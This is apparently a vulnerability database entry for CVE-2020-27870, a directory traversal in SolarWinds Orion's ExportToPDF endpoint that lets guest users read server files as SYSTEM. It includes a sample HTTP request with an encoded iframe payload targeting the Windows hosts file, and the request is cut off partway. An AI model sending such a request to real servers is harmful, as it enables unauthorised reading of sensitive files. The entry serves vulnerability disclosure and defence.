SolarWinds Orion Platform... CVE-2020-27870

4.0 AV AC AU C I A
发布: 2021-02-10
修订: 2024-11-21

**CVE-2020-27870: Directory Traversal leading to arbitrary file read** The endpoint `/orion/ExportToPDF.aspx` converts HTML to PDF, but it fails to check if the HTML contains references to local files. Furthermore, the guest user account can access this endpoint. By supplying HTML files that contain references to local files, it is possible to read arbitrary files on the server in the context of SYSTEM. For example, the following request can be used to retrieve the contents of `C:\Windows\system32\drivers\etc\hosts`: ``` POST /orion/ExportToPDF.aspx?ExportID=55475&PageHTML=%3Chtml%3E%3Ciframe%20src=%22C:%5CWindows%5Csystem32%5Cdrivers%5Cetc%5Chosts%22%20width=%221000%22%20height=%221000%22%3E%3C/html%3E HTTP/1.1. <------- Host: 172.16.11.168:8787 User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Origin: http://172.16.11.168:8787 X-Requested-With: XMLHttpRequest Referer: http://172.16.11.168:8787/Orion/SummaryView.aspx?ViewID=1 Content-Type:...

0%
暂无可用Exp或PoC
当前有1条受影响产品信息